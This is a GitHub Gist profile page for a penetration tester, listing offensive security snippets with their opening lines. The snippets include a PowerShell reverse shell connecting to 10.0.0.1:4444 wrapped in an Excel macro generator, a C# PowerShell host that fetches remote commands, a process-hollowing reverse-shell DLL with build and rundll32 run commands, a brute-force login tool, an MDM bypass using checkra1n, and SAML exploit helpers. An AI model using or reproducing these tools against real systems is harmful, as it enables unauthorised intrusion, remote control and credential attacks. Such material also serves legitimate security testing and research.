Skip to content

Instantly share code, notes, and snippets.

Avatar

Frank Spierings FrankSpierings

View GitHub Profile
@FrankSpierings
FrankSpierings / generate-xlsm-macro.py
Created Apr 30, 2021
Generate a XLSM macro from python
View generate-xlsm-macro.py
import codecs
import base64
data = '''$lhost="10.0.0.1";
$lport=4444;
$MAXCMDLENGTH=65535;
$client = New-Object System.Net.Sockets.TCPClient($lhost, $lport);
$stream = $client.GetStream();
@FrankSpierings
FrankSpierings / pshost.cs
Created Apr 29, 2021
PowerShell Host example. Obtaining its commands from a remote location.
View pshost.cs
// c:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe pshost.cs /r:c:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll
using System;
using System.Management.Automation;
using System.Management.Automation.Runspaces;
using PowerShell = System.Management.Automation.PowerShell;
internal class InfantAnnihilator
{
private static void Main(string[] args)
{
@FrankSpierings
FrankSpierings / ms-rsa-blob-to.py
Last active Apr 25, 2021
Decrypt Protect file using PVK Domain key
View ms-rsa-blob-to.py
# Referenced sources:
# - Mimikatz
# - https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-wcce/5cf2e6b9-3195-4f85-bc18-05b50e6d4e11
# - https://docs.microsoft.com/en-us/windows/win32/api/wincrypt/ns-wincrypt-publickeystruc
from io import BytesIO
import struct
import math
import codecs
from Crypto.PublicKey import RSA
@FrankSpierings
FrankSpierings / Brutus.java
Created Mar 16, 2021
Brutus - Brute-force login on a Xelion system using their own classes.
View Brutus.java
/*
- Get the .jar files from the server (check .jnlp file).
- Extract those .jar files (unzip).
- Place Brutus.java in the same directory.
- Compile using the JDK: "c:\Program Files\Java\jdk-16\bin\javac.exe" -target 1.7 -source 1.7 Brutus.java
- Notice the target & source. Otherwise CORBA can't be found.
- Run: java Brutus <accountname> <ascii password file> <target>
- Example: java Brutus beheerder passwords.txt xelion.local
*/
@FrankSpierings
FrankSpierings / samlraider.py
Created Feb 25, 2021
SAMLRaider in Python, useful to automate (new) logins and the automatic exploit checks.
View samlraider.py
import xml.dom.minidom as minidom
# Constants
COLLABORATOR = 'example.burpcollaborator.net'
class SAMLRaider():
def __init__(self, match_replace_map: dict = None):
"""SAMLRainder object
@FrankSpierings
FrankSpierings / README.MD
Last active Apr 7, 2021
Apple Device Enrollment Program (DEP) - ByPass MDM Policy using Checkra1n exploit
View README.MD

Pre-requirements

  • Install a socket daemon to multiplex connections from and to iOS devices, run: brew install usbmuxd
  • Start the socket daemon iproxy 2222 44
  • Install checkra1n exploit locally, run: brew install checkra1n
  • When SSH password authentication is requested, use: alpline.

Wipe iPad and restore Firmware

@FrankSpierings
FrankSpierings / process-hollow-shell-dll.c
Last active Nov 26, 2020
Reverse shell which uses process hollowing technique
View process-hollow-shell-dll.c
// docker run -it --rm -v `pwd`:/tmp/building ubuntu bash -c "cd /tmp/building; apt update && apt install -y mingw-w64 upx && i686-w64-mingw32-gcc -O3 -s process-hollow-shell-dll.c -lws2_32 -lntdll -shared -o process-hollow-shell.dll; upx --ultra-brute process-hollow-shell.dll"
//
// Use -DDEBUG at compile time, for the logging printf messages.
// Use -DNON_MS_DLL_BLOCK at compile time, to block injection of non Microsoft DLL's into the host process.
// Use -DWAITFOR at compile time, to wait for the host process to finish.
//
// Run:
// rundll32 process-hollow-shell.dll,main 127.0.0.1 4444
// rundll32 process-hollow-shell.dll,main 127.0.0.1 4444 c:\windows\system32\cmd.exe
// rundll32 process-hollow-shell.dll,main 127.0.0.1 4444 c:\windows\system32\cmd.exe c:\windows\system32\notepad.exe
@FrankSpierings
FrankSpierings / request-minify.py
Last active Feb 9, 2021
Burp extension to minify a requests headers and parameters to another repeater tab.
View request-minify.py
from burp import IParameter
from burp import IBurpExtender
from burp import IContextMenuFactory
from burp import IContextMenuInvocation
from javax.swing import JMenuItem
import java.util.ArrayList as ArrayList
from threading import Thread
from Queue import Queue
from traceback import format_exc
import time
@FrankSpierings
FrankSpierings / burp-ntfs-ads-scan.py
Last active Nov 10, 2020
Burp NTFS Alternative Data Stream Scanner
View burp-ntfs-ads-scan.py
# coding=utf-8
from burp import IBurpExtender
from burp import IScannerCheck
from burp import IScanIssue
from burp import IScannerInsertionPoint
from array import array
class BurpExtender(IBurpExtender, IScannerCheck):
@FrankSpierings
FrankSpierings / cookie-authenticated-onedrive-enum.py
Created Oct 6, 2020
Checks OneDrive access based on someone's UPN.
View cookie-authenticated-onedrive-enum.py